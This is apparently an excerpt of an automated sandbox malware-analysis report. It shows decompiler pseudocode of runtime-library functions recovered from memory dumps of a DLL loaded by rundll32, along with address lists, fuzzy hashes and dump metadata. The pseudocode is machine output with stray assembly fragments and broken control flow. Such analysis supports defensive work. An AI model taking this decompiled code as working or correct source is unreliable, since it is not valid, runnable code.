				long long* _t157;
				signed long long _t165;
				signed long long _t166;
				signed long long _t167;
				signed long long _t168;
				long long* _t189;
				signed long long _t194;
				int _t198;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				void* _t209;
				void* _t213;
				void* _t214;
				long long _t215;
				intOrPtr* _t217;

				_t200 = _t199 - 0x88;
				_t198 = _t200 + 0x50;
				_t133 =  *0x53754140; // 0x3c63485c5c92
				_t134 = _t133 ^ _t198;
				 *(_t198 + 0x28) = _t134;
				r12d = 0;
				_t217 =  *((intOrPtr*)(_t198 + 0xa8));
				 *_t198 = r8d;
				 *((long long*)(_t198 + 8)) = __rdx;
				if ( *((intOrPtr*)(_t198 + 0xa0)) <= 0) goto 0x535f381f;
				E00007FFA7FFA535F3620(_t134, __r9,  *((intOrPtr*)(_t198 + 0xa0)));
				_t156 = _t134;
				if ( *((intOrPtr*)(_t198 + 0xb0)) <= 0) goto 0x535f382b;
				_t65 = E00007FFA7FFA535F3620(_t134, _t217,  *((intOrPtr*)(_t198 + 0xb0)));
				_t194 = _t134;
				goto 0x535f3830;
				if (_t156 - 0xffffffff >= 0) goto 0x535f3804;
				goto 0x535f3b21;
				if (_t194 - 0xffffffff < 0) goto 0x535f3824;
				r14d =  *((intOrPtr*)(_t198 + 0xb8));
				if (r14d != 0) goto 0x535f3843;
				r14d =  *((intOrPtr*)( *__rcx + 0xc));
				if (_t194 != 0) goto 0x535f38ef;
				if (_t156 != _t194) goto 0x535f3862;
				 *_t156 =  *_t156 + dil;
				goto 0x535f3b21;
				if (_t156 - 0x1 <= 0) goto 0x535f387b;
				 *0x2A6E8FFFFFF90 =  *((intOrPtr*)(0x2a6e8ffffff90)) + _t76;
				asm("adc [ecx-0x75], al");
				asm("into");
				_t67 = GetCPInfo(_t198);
				if (0x3 == 0) goto 0x535f3824;
				if (_t156 <= 0) goto 0x535f38bb;
				if ( *((long long*)(_t198 + 0x10)) - 2 < 0) goto 0x535f3871;
				_t140 = _t198 + 0x16;
				if ( *((intOrPtr*)(_t198 + 0x16)) == r12b) goto 0x535f3871;
				if ( *((intOrPtr*)(_t140 + 1)) == r12b) goto 0x535f3871;
				_t77 =  *__r9;
				if (_t77 -  *_t140 < 0) goto 0x535f38b2;
				if (_t77 -  *((intOrPtr*)(_t140 + 1)) <= 0) goto 0x535f3858;
				goto 0x535f389e;
				if (_t194 <= 0) goto 0x535f38ef;
				if ( *((long long*)(_t198 + 0x10)) - 2 < 0) goto 0x535f3866;
				_t142 = _t198 + 0x16;
				if ( *((intOrPtr*)(_t198 + 0x16)) == r12b) goto 0x535f3866;
				if ( *((intOrPtr*)(_t142 + 1)) == r12b) goto 0x535f3866;
				_t78 =  *_t217;
				if (_t78 -  *_t142 < 0) goto 0x535f38e6;
				if (_t78 -  *((intOrPtr*)(_t142 + 1)) <= 0) goto 0x535f3858;
				_t143 = _t142 + 2;
				goto 0x535f38cd;
				 *(_t200 + 0x28) = r12d;
				r9d = __ebx;
				 *((long long*)(_t200 + 0x20)) = _t215;
				asm("adc eax, 0x886b");
				if (_t143 == 0) goto 0x535f3824;
				_t181 = _t67 + _t67;
				_t29 = _t181 + 0x10; // 0x10
				asm("dec eax");
				if ((_t29 & _t143) == 0) goto 0x535f39a9;
				_t32 = _t181 + 0x10; // 0x10
				_t165 = _t32;
				asm("dec eax");
				_t33 = _t181 + 0x10; // 0x10
				if ((_t143 & _t165) - 0x400 > 0) goto 0x535f3987;
				asm("dec eax");
				_t166 = _t165 & _t33;
				_t34 = _t166 + 0xf; // 0x1f
				if (_t34 - _t166 > 0) goto 0x535f3965;
				E00007FFA7FFA535F54B0(_t78, 0xffffffffffffff0, _t166, _t67 + _t67, 0xfffffff0, _t213, _t214);
				_t201 = _t200 - 0xfffffff0;
				_t189 = _t201 + 0x50;
				if (_t189 == 0) goto 0x535f3b07;
				 *_t189 = 0xcccc;
				goto 0x535f39a3;
				asm("dec eax");
				_t167 = _t166 & 0xfffffff0;
				_t69 = E00007FFA7FFA535E7E98(0xffffffffffffff0, _t167);
				if (0xfffffff0 == 0) goto 0x535f39ab;
				 *0xfffffff0 = 0xdddd;
				goto 0x535f39ab;
				if (0 == 0) goto 0x535f3b07;
				 *(_t201 + 0x28) = r12d;
				r9d = __ebx;
				 *(_t201 + 0x20) = 0;
				asm("adc eax, 0x87a6");
				if (0xfffffff0 == 0) goto 0x535f3b07;
				 *(_t201 + 0x28) =  *(_t201 + 0x28) & 0x00000000;
				r9d = __esi;
				 *(_t201 + 0x20) =  *(_t201 + 0x20) & 0x00000000;
				asm("adc eax, 0x877f");
				if (0xfffffff0 == 0) goto 0x535f3b07;
				_t209 = _t69 + _t69;
				asm("dec eax");
				if ((_t209 + 0x00000010 & _t167) == 0) goto 0x535f3a92;
				_t168 = _t209 + 0x10;
				asm("dec eax");
				if ((0xffffffffffffff0 & _t168) - 0x400 > 0) goto 0x535f3a70;
				asm("dec eax");
				_t169 = _t168 & _t209 + 0x00000010;
				if ((_t168 & _t209 + 0x00000010) + 0xf - (_t168 & _t209 + 0x00000010) > 0) goto 0x535f3a4e;
				E00007FFA7FFA535F54B0(_t78, 0xffffffffffffff0, _t168 & _t209 + 0x00000010, _t209 + 0x10, _t209, _t213, _t214);
				_t202 = _t201 - 0xfffffff0;
				_t157 = _t202 + 0x50;
				if (_t157 == 0) goto 0x535f3aed;
				 *_t157 = 0xcccc;
				goto 0x535f3a8c;
				asm("dec eax");
				E00007FFA7FFA535E7E98(0xffffffffffffff0, _t169 & 0xfffffff0);
				if (0xfffffff0 == 0) goto 0x535f3a94;
				 *0xfffffff0 = 0xdddd;
				goto 0x535f3a94;
				if (0 == 0) goto 0x535f3aed;
				 *((intOrPtr*)(_t202 + 0x28)) = r15d;
				r9d = __esi;
				 *((long long*)(_t202 + 0x20)) = 0;
				asm("adc eax, 0x86c1");
				if (0xffffffffffffff0 == 0) goto 0x535f3aed;
				 *(_t202 + 0x40) =  *(_t202 + 0x40) & 0x00000000;
				r9d = r12d;
				 *(_t202 + 0x38) =  *(_t202 + 0x38) & 0x00000000;
				 *(_t202 + 0x30) =  *(_t202 + 0x30) & 0x00000000;
				 *((intOrPtr*)(_t202 + 0x28)) = r15d;
				 *((long long*)(_t202 + 0x20)) = 0;
				E00007FFA7FFA535ED8B8(_t65 %  *(_t194 + 7), 0xffffffffffffff0, 0,  *((intOrPtr*)(_t198 + 8)), 0, _t194, _t198, 0);
				goto 0x535f3aef;
				if (0 == 0) goto 0x535f3b09;
				if ( *0xFFFFFFFFFFFFFFF0 != 0xdddd) goto 0x535f3b09;
				E00007FFA7FFA535E7E58(0xffffffffffffff0, 0xfffffffffffffff0);
				goto 0x535f3b09;
				if (0 == 0) goto 0x535f3b1f;
				if ( *((long long*)(0xfffffffffffffff0)) != 0xdddd) goto 0x535f3b1f;
				_t74 = E00007FFA7FFA535E7E58(0xffffffffffffff0, 0xfffffffffffffff0);
				E00007FFA7FFA535F51E0();
				return _t74;
			}





































                0x7ffa535f37b9
                0x7ffa535f37c0
                0x7ffa535f37c5
                0x7ffa535f37cc
                0x7ffa535f37cf
                0x7ffa535f37da
                0x7ffa535f37dd
                0x7ffa535f37e7
                0x7ffa535f37ee
                0x7ffa535f37f4
                0x7ffa535f37fc
                0x7ffa535f3801
                0x7ffa535f380d
                0x7ffa535f3815
                0x7ffa535f381a
                0x7ffa535f381d
                0x7ffa535f3822
                0x7ffa535f3826
                0x7ffa535f382e
                0x7ffa535f3830
                0x7ffa535f383a
                0x7ffa535f383f
                0x7ffa535f384e
                0x7ffa535f3856
                0x7ffa535f3861
                0x7ffa535f3868
                0x7ffa535f386f
                0x7ffa535f387a
                0x7ffa535f387e
                0x7ffa535f3881
                0x7ffa535f3882
                0x7ffa535f388a
                0x7ffa535f388e
                0x7ffa535f3894
                0x7ffa535f389a
                0x7ffa535f389e
                0x7ffa535f38a4
                0x7ffa535f38a6
                0x7ffa535f38ab
                0x7ffa535f38b0
                0x7ffa535f38b9
                0x7ffa535f38bd
                0x7ffa535f38c3
                0x7ffa535f38c9
                0x7ffa535f38cd
                0x7ffa535f38d3
                0x7ffa535f38d5
                0x7ffa535f38db
                0x7ffa535f38e0
                0x7ffa535f38e6
                0x7ffa535f38ed
                0x7ffa535f38ef
                0x7ffa535f38f4
                0x7ffa535f38fa
                0x7ffa535f3908
                0x7ffa535f3912
                0x7ffa535f3925
                0x7ffa535f3928
                0x7ffa535f392f
                0x7ffa535f3935
                0x7ffa535f3937
                0x7ffa535f3937
                0x7ffa535f393e
                0x7ffa535f394a
                0x7ffa535f394e
                0x7ffa535f3953
                0x7ffa535f3956
                0x7ffa535f3959
                0x7ffa535f3960
                0x7ffa535f3969
                0x7ffa535f396e
                0x7ffa535f3971
                0x7ffa535f3979
                0x7ffa535f397f
                0x7ffa535f3985
                0x7ffa535f398a
                0x7ffa535f398d
                0x7ffa535f3990
                0x7ffa535f399b
                0x7ffa535f399d
                0x7ffa535f39a7
                0x7ffa535f39ae
                0x7ffa535f39b4
                0x7ffa535f39b9
                0x7ffa535f39bf
                0x7ffa535f39cd
                0x7ffa535f39d4
                0x7ffa535f39da
                0x7ffa535f39df
                0x7ffa535f39e2
                0x7ffa535f39f4
                0x7ffa535f39fe
                0x7ffa535f3a07
                0x7ffa535f3a11
                0x7ffa535f3a17
                0x7ffa535f3a19
                0x7ffa535f3a20
                0x7ffa535f3a30
                0x7ffa535f3a35
                0x7ffa535f3a38
                0x7ffa535f3a42
                0x7ffa535f3a52
                0x7ffa535f3a57
                0x7ffa535f3a5a
                0x7ffa535f3a62
                0x7ffa535f3a68
                0x7ffa535f3a6e
                0x7ffa535f3a73
                0x7ffa535f3a79
                0x7ffa535f3a84
                0x7ffa535f3a86
                0x7ffa535f3a90
                0x7ffa535f3a97
                0x7ffa535f3a99
                0x7ffa535f3a9e
                0x7ffa535f3aa4
                0x7ffa535f3ab2
                0x7ffa535f3ab9
                0x7ffa535f3abb
                0x7ffa535f3ac1
                0x7ffa535f3ac4
                0x7ffa535f3acd
                0x7ffa535f3ada
                0x7ffa535f3adf
                0x7ffa535f3ae4
                0x7ffa535f3aeb
                0x7ffa535f3af2
                0x7ffa535f3afe
                0x7ffa535f3b00
                0x7ffa535f3b05
                0x7ffa535f3b0c
                0x7ffa535f3b18
                0x7ffa535f3b1a
                0x7ffa535f3b28
                0x7ffa535f3b3d

                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6a647bc2f0d06cadd2b7bd3f3bba938a5c688e9845753ee657085d7cf8953cb4
                • Instruction ID: 972d0482d3329e393c88d519c077d3490ce639df4d23031a2b85a65582a6c7b7
                • Opcode Fuzzy Hash: 6a647bc2f0d06cadd2b7bd3f3bba938a5c688e9845753ee657085d7cf8953cb4
                • Instruction Fuzzy Hash: B5A1D5A2B29B824DFB218BA1945037D669BAF82BA4F4C9631DB5D277C5DF3CE444C300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215206197F8 Relevance: 7.8, APIs: 5, Instructions: 265COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 659ba7b49373035babac36c5c08596b7598a4fdf9888a41ab73fbad75e115d26
                • Instruction ID: efee9d7ee7096915a7a9e74d9ffd865ee4ed86624a2cffa40641849a8b6a5ee1
                • Opcode Fuzzy Hash: 659ba7b49373035babac36c5c08596b7598a4fdf9888a41ab73fbad75e115d26
                • Instruction Fuzzy Hash: F1A1F673706BA0C6FF708F6194483EAA691FFA1BA4F6846659E59077CDDB38E444C320
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F4378 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                Download Yara Rule
                C-Code - Quality: 48%
                			E00007FFA7FFA535F4378(signed long long __ecx, void* __edx, void* __esi, void* __ebp, void* __rax, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
				char _v64;
				signed long long _v72;
				void* _v84;
				unsigned int _v88;
				void* _v96;
				long long _v100;
				signed int _v104;
				signed int _v120;
				void* __rsi;
				void* __rbp;
				void* _t74;
				void* _t75;
				void* _t94;
				intOrPtr _t95;
				void* _t96;
				void* _t102;
				void* _t107;
				void* _t128;
				signed long long _t142;
				intOrPtr _t144;
				long long* _t152;
				signed long long* _t154;
				intOrPtr _t162;
				signed short* _t183;
				void* _t185;
				void* _t188;
				signed long long _t195;
				void* _t196;
				signed long long _t198;
				signed long long _t199;
				signed long long _t201;
				void* _t202;
				signed short* _t203;

				_t193 = __r9;
				_t157 = __rbx;
				_t102 = __edx;
				_a32 = __rbx;
				r15d = r8d;
				_t195 = __ecx;
				_t183 = __rdx;
				if (r8d != 0) goto 0x535f43a6;
				goto 0x535f4641;
				if (__rdx != 0) goto 0x535f43ca;
				E00007FFA7FFA535E8360(0);
				 *((long long*)(0)) = 0;
				_t74 = E00007FFA7FFA535E8380(0);
				 *((long long*)(0)) = 0x16;
				_t75 = E00007FFA7FFA535E8260(_t74);
				goto 0x535f4641;
				r14d = r14d & 0x0000003f;
				_t198 = _t195 >> 6;
				_t201 = _t195 << 6;
				_v72 = _t198;
				_t162 =  *((intOrPtr*)(0x53754e50 + _t198 * 8));
				_t95 =  *((intOrPtr*)(_t162 + _t201 + 0x39));
				if (_t75 - 1 > 0) goto 0x535f4400;
				_t142 =  !(__rbx - 1);
				if ((r15d & 0x00000001) == 0) goto 0x535f43ab;
				if (( *(_t162 + _t201 + 0x38) & 0x00000020) == 0) goto 0x535f4416;
				r8d = 2;
				E00007FFA7FFA535F4CA8(r12d, _t102, _t107, _t142, __rbx, _t162, 0, __rdx, _t188);
				_v88 = 0;
				E00007FFA7FFA535E4A88(r12d, _t142);
				if (_t142 == 0) goto 0x535f452b;
				_t144 =  *((intOrPtr*)(0x53754e50 + _t198 * 8));
				if (( *(0x53754e50 + _t201 + 0x38) & 0x00000080) == 0) goto 0x535f452b;
				E00007FFA7FFA535E8A30(_t144, _t157, _t162, 0, __r9);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0x90)) + 0x138)) != 0) goto 0x535f446c;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x53754e50 + _t198 * 8)) + _t201 + 0x39)) == dil) goto 0x535f452b;
				GetConsoleMode(??, ??);
				if (0x53754e50 == 0) goto 0x535f452b;
				if (_t95 == 0) goto 0x535f450d;
				_t96 = _t95 - 1;
				if (_t96 - 1 > 0) goto 0x535f45c8;
				_v104 = _v104 & 0;
				_t196 = _t183 + _t202;
				_t203 = _t183;
				_v100 = 0;
				if (_t183 - _t196 >= 0) goto 0x535f45be;
				r13d =  *_t203 & 0x0000ffff;
				if (E00007FFA7FFA535F4DA0(r13w & 0xffffffff) != r13w) goto 0x535f44fb;
				_v100 = 2;
				if (r13w != 0xa) goto 0x535f44f0;
				r13d = 0xd;
				if (E00007FFA7FFA535F4DA0(r13d) != r13w) goto 0x535f44fb;
				_v100 = 2;
				if ( &(_t203[1]) - _t196 >= 0) goto 0x535f4504;
				goto 0x535f44b5;
				GetLastError();
				_v104 = 0x53754e50;
				_t199 = _v72;
				goto 0x535f45be;
				r9d = r15d;
				E00007FFA7FFA535F3CEC(r12d, _t107, __esi, 3,  &_v104,  &_v64, _t183, _t193);
				asm("movsd xmm0, [eax]");
				goto 0x535f45c3;
				if (( *( *((intOrPtr*)(0x53754e50 + _t199 * 8)) + _t201 + 0x38) & 0x00000080) == 0) goto 0x535f458b;
				_t128 = _t96;
				if (_t128 == 0) goto 0x535f4577;
				if (_t128 == 0) goto 0x535f4563;
				if (_t96 - 1 != 1) goto 0x535f45c8;
				r9d = r15d;
				E00007FFA7FFA535F3FFC(_t96, r12d, 0x53754e50, 3,  &_v104, _t185, _t183);
				goto 0x535f451f;
				r9d = r15d;
				E00007FFA7FFA535F4118(r12d, _t107, 0x53754e50, 3,  &_v104, _t185, _t183);
				goto 0x535f451f;
				r9d = r15d;
				E00007FFA7FFA535F3EF4(r12d, _t107, 0x53754e50, 3,  &_v104, _t185, _t183);
				goto 0x535f451f;
				_v104 = _v104 &  *0x7FFA53754E58;
				_v120 = _v120 & 0;
				r8d = r15d;
				_v100 = 0;
				WriteFile(??, ??, ??, ??, ??);
				if (0 != 0) goto 0x535f45bb;
				GetLastError();
				_v104 = 0;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				if (_v88 >> 0x20 != 0) goto 0x535f463c;
				_t152 = _v88;
				if (_t152 == 0) goto 0x535f4608;
				if (_t152 != 5) goto 0x535f45fb;
				E00007FFA7FFA535E8380(_t152);
				 *_t152 = 9;
				E00007FFA7FFA535E8360(_t152);
				 *_t152 = 5;
				goto 0x535f43c2;
				E00007FFA7FFA535E8310(r13d, _t152, 3);
				goto 0x535f43c2;
				_t154 =  *((intOrPtr*)(0x53754e50 + _t199 * 8));
				if (( *(0x53754e50 + _t201 + 0x38) & 0x00000040) == 0) goto 0x535f4624;
				if ( *_t183 == 0x1a) goto 0x535f439f;
				E00007FFA7FFA535E8380(_t154);
				 *0x53754e50 = 0x1c;
				_t94 = E00007FFA7FFA535E8360(_t154);
				 *_t154 =  *_t154 & 0x00000000;
				goto 0x535f43c2;
				return _t94;
			}




































                0x7ffa535f4378
                0x7ffa535f4378
                0x7ffa535f4378
                0x7ffa535f4378
                0x7ffa535f4391
                0x7ffa535f4394
                0x7ffa535f4397
                0x7ffa535f439d
                0x7ffa535f43a1
                0x7ffa535f43a9
                0x7ffa535f43ab
                0x7ffa535f43b0
                0x7ffa535f43b2
                0x7ffa535f43b7
                0x7ffa535f43bd
                0x7ffa535f43c5
                0x7ffa535f43d4
                0x7ffa535f43db
                0x7ffa535f43df
                0x7ffa535f43e3
                0x7ffa535f43e7
                0x7ffa535f43eb
                0x7ffa535f43f5
                0x7ffa535f43fa
                0x7ffa535f43fe
                0x7ffa535f4406
                0x7ffa535f440d
                0x7ffa535f4411
                0x7ffa535f4419
                0x7ffa535f441d
                0x7ffa535f4424
                0x7ffa535f4431
                0x7ffa535f443b
                0x7ffa535f4441
                0x7ffa535f4454
                0x7ffa535f4466
                0x7ffa535f4480
                0x7ffa535f4488
                0x7ffa535f4490
                0x7ffa535f4492
                0x7ffa535f4497
                0x7ffa535f449d
                0x7ffa535f44a0
                0x7ffa535f44a6
                0x7ffa535f44a9
                0x7ffa535f44af
                0x7ffa535f44b5
                0x7ffa535f44c6
                0x7ffa535f44cb
                0x7ffa535f44d3
                0x7ffa535f44d5
                0x7ffa535f44e7
                0x7ffa535f44eb
                0x7ffa535f44f7
                0x7ffa535f44f9
                0x7ffa535f44fb
                0x7ffa535f4501
                0x7ffa535f4504
                0x7ffa535f4508
                0x7ffa535f450d
                0x7ffa535f451a
                0x7ffa535f451f
                0x7ffa535f4526
                0x7ffa535f453c
                0x7ffa535f4541
                0x7ffa535f4543
                0x7ffa535f4548
                0x7ffa535f454d
                0x7ffa535f454f
                0x7ffa535f455c
                0x7ffa535f4561
                0x7ffa535f4563
                0x7ffa535f4570
                0x7ffa535f4575
                0x7ffa535f4577
                0x7ffa535f4584
                0x7ffa535f4589
                0x7ffa535f4594
                0x7ffa535f4599
                0x7ffa535f459e
                0x7ffa535f45a4
                0x7ffa535f45a8
                0x7ffa535f45b0
                0x7ffa535f45b2
                0x7ffa535f45b8
                0x7ffa535f45be
                0x7ffa535f45c3
                0x7ffa535f45d2
                0x7ffa535f45d4
                0x7ffa535f45d9
                0x7ffa535f45de
                0x7ffa535f45e0
                0x7ffa535f45e5
                0x7ffa535f45eb
                0x7ffa535f45f0
                0x7ffa535f45f6
                0x7ffa535f45fe
                0x7ffa535f4603
                0x7ffa535f460f
                0x7ffa535f4619
                0x7ffa535f461e
                0x7ffa535f4624
                0x7ffa535f4629
                0x7ffa535f462f
                0x7ffa535f4634
                0x7ffa535f4637
                0x7ffa535f4658

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: 25528e04e11f271ec241f921196ce4d7b5384367a7b14c3a2b7fb6a4004ca7d6
                • Instruction ID: e79e2f86366f569ae94da9adcb03faac9333a13f018f85a3e66852ab38498644
                • Opcode Fuzzy Hash: 25528e04e11f271ec241f921196ce4d7b5384367a7b14c3a2b7fb6a4004ca7d6
                • Instruction Fuzzy Hash: 028192E2E38F124DF712AB65D4406BD26AABBC6B54F48A135DE0E23695CF3CE465C310
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215206178D0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                Download Yara Rule
                C-Code - Quality: 44%
                			E00000215215206178D0(signed long long __ecx, void* __edx, void* __esi, intOrPtr* __rax, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
				char _v64;
				signed long long _v72;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v96;
				long long _v100;
				signed int _v104;
				signed int _v120;
				void* __rbp;
				void* _t75;
				long _t94;
				unsigned int _t95;
				intOrPtr _t103;
				signed int _t124;
				intOrPtr _t157;
				unsigned long long _t163;
				signed int* _t165;
				intOrPtr _t168;
				signed short* _t178;
				unsigned int _t181;
				signed short* _t182;
				void* _t184;
				signed long long _t193;
				void* _t194;
				signed long long _t196;
				signed long long _t197;
				signed long long _t199;
				void* _t200;
				signed short* _t201;

				_t178 = __rdx;
				_t166 = __rbx;
				_a32 = __rbx;
				r15d = r8d;
				_t193 = __ecx;
				_t182 = __rdx;
				if (r8d != 0) goto 0x206178fe;
				goto 0x20617b99;
				if (__rdx != 0) goto 0x20617922;
				E0000021521520603924(__rax);
				 *__rax = 0;
				_t75 = E0000021521520603944(__rax);
				 *__rax = 0x16;
				E00000215215205FAABC(_t75);
				goto 0x20617b99;
				r14d = r14d & 0x0000003f;
				_t196 = _t193 >> 6;
				_t199 = _t193 << 6;
				_v72 = _t196;
				_t168 =  *((intOrPtr*)(0x20682b40 + _t196 * 8));
				_t103 =  *((intOrPtr*)(_t168 + _t199 + 0x39));
				if (__rbx - 1 - 1 > 0) goto 0x20617958;
				if (( !r15d & 0x00000001) == 0) goto 0x20617903;
				if (( *(_t168 + _t199 + 0x38) & 0x00000020) == 0) goto 0x2061796e;
				_t14 = _t178 + 2; // 0x2
				r8d = _t14;
				E00000215215206190C0();
				_v88 = _t181;
				if (E0000021521520616880(r12d, 0, 0x20682b40) == 0) goto 0x20617a83;
				_t157 =  *((intOrPtr*)(0x20682b40 + _t196 * 8));
				if (( *(0x20682b40 + _t199 + 0x38) & 0x00000080) == 0) goto 0x20617a83;
				E000002152152060C334(_t157, __rbx, _t168, _t178, __r9);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x90)) + 0x138)) != _t181) goto 0x206179c4;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x20682b40 + _t196 * 8)) + _t199 + 0x39)) == dil) goto 0x20617a83;
				if (GetConsoleMode(??, ??) == 0) goto 0x20617a83;
				if (_t103 == 0) goto 0x20617a65;
				if (_t103 - 1 - 1 > 0) goto 0x20617b20;
				_v104 = _v104 & 0;
				_t194 = _t182 + _t200;
				_t201 = _t182;
				_v100 = 0;
				if (_t182 - _t194 >= 0) goto 0x20617b16;
				r13d =  *_t201 & 0x0000ffff;
				if (E0000021521520619628(r13w & 0xffffffff) != r13w) goto 0x20617a53;
				_v100 = 2;
				if (r13w != 0xa) goto 0x20617a48;
				r13d = 0xd;
				if (E0000021521520619628(r13d) != r13w) goto 0x20617a53;
				_v100 = 2;
				if ( &(_t201[1]) - _t194 >= 0) goto 0x20617a5c;
				goto 0x20617a0d;
				_v104 = GetLastError();
				_t197 = _v72;
				goto 0x20617b16;
				r9d = r15d;
				E0000021521520617244(r12d, 1, __esi, _t166,  &_v104,  &_v64, _t182);
				asm("movsd xmm0, [eax]");
				_t124 =  *0x21520682B48;
				goto 0x20617b1b;
				if (( *( *((intOrPtr*)(0x20682b40 + _t197 * 8)) + _t199 + 0x38) & 0x00000080) == 0) goto 0x20617ae3;
				if (3 == 0) goto 0x20617acf;
				if (3 == 0) goto 0x20617abb;
				if (2 != 1) goto 0x20617b20;
				r9d = r15d;
				E0000021521520617554(3, r12d, 0x20682b40, _t166,  &_v104, _t184, _t182);
				goto 0x20617a77;
				r9d = r15d;
				E0000021521520617670(r12d, _t124, 0x20682b40, _t166,  &_v104, _t184, _t182);
				goto 0x20617a77;
				r9d = r15d;
				E000002152152061744C(r12d, _t124, 0x20682b40, _t166,  &_v104, _t184, _t182);
				goto 0x20617a77;
				_v104 = _v104 & _t124;
				_v120 = _v120 & 0x20682b40;
				r8d = r15d;
				_v100 = 0x20682b40;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x20617b13;
				_t94 = GetLastError();
				_v104 = _t94;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				_t163 = _v88 >> 0x20;
				if (_t94 != 0) goto 0x20617b94;
				_t95 = _v88;
				if (_t95 == 0) goto 0x20617b60;
				if (_t95 != 5) goto 0x20617b53;
				E0000021521520603944(_t163);
				 *_t163 = 9;
				E0000021521520603924(_t163);
				 *_t163 = 5;
				goto 0x2061791a;
				E00000215215206038D4(_v88, _t163, _t166);
				goto 0x2061791a;
				_t165 =  *((intOrPtr*)(0x20682b40 + _t197 * 8));
				if (( *(0x20682b40 + _t199 + 0x38) & 0x00000040) == 0) goto 0x20617b7c;
				if ( *_t182 == 0x1a) goto 0x206178f7;
				E0000021521520603944(_t165);
				 *0x20682b40 = 0x1c;
				E0000021521520603924(_t165);
				 *_t165 =  *_t165 & 0x00000000;
				goto 0x2061791a;
				return _v84 - _v96;
			}
































                0x215206178d0
                0x215206178d0
                0x215206178d0
                0x215206178e9
                0x215206178ec
                0x215206178ef
                0x215206178f5
                0x215206178f9
                0x21520617901
                0x21520617903
                0x21520617908
                0x2152061790a
                0x2152061790f
                0x21520617915
                0x2152061791d
                0x2152061792c
                0x21520617933
                0x21520617937
                0x2152061793b
                0x2152061793f
                0x21520617943
                0x2152061794d
                0x21520617956
                0x2152061795e
                0x21520617965
                0x21520617965
                0x21520617969
                0x21520617971
                0x2152061797c
                0x21520617989
                0x21520617993
                0x21520617999
                0x215206179ac
                0x215206179be
                0x215206179e0
                0x215206179e8
                0x215206179ef
                0x215206179f5
                0x215206179f8
                0x215206179fe
                0x21520617a01
                0x21520617a07
                0x21520617a0d
                0x21520617a1e
                0x21520617a23
                0x21520617a2b
                0x21520617a2d
                0x21520617a3f
                0x21520617a43
                0x21520617a4f
                0x21520617a51
                0x21520617a59
                0x21520617a5c
                0x21520617a60
                0x21520617a65
                0x21520617a72
                0x21520617a77
                0x21520617a7b
                0x21520617a7e
                0x21520617a94
                0x21520617a9b
                0x21520617aa0
                0x21520617aa5
                0x21520617aa7
                0x21520617ab4
                0x21520617ab9
                0x21520617abb
                0x21520617ac8
                0x21520617acd
                0x21520617acf
                0x21520617adc
                0x21520617ae1
                0x21520617aec
                0x21520617af1
                0x21520617af6
                0x21520617afc
                0x21520617b08
                0x21520617b0a
                0x21520617b10
                0x21520617b16
                0x21520617b1b
                0x21520617b24
                0x21520617b2a
                0x21520617b2c
                0x21520617b31
                0x21520617b36
                0x21520617b38
                0x21520617b3d
                0x21520617b43
                0x21520617b48
                0x21520617b4e
                0x21520617b56
                0x21520617b5b
                0x21520617b67
                0x21520617b71
                0x21520617b76
                0x21520617b7c
                0x21520617b81
                0x21520617b87
                0x21520617b8c
                0x21520617b8f
                0x21520617bb0

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
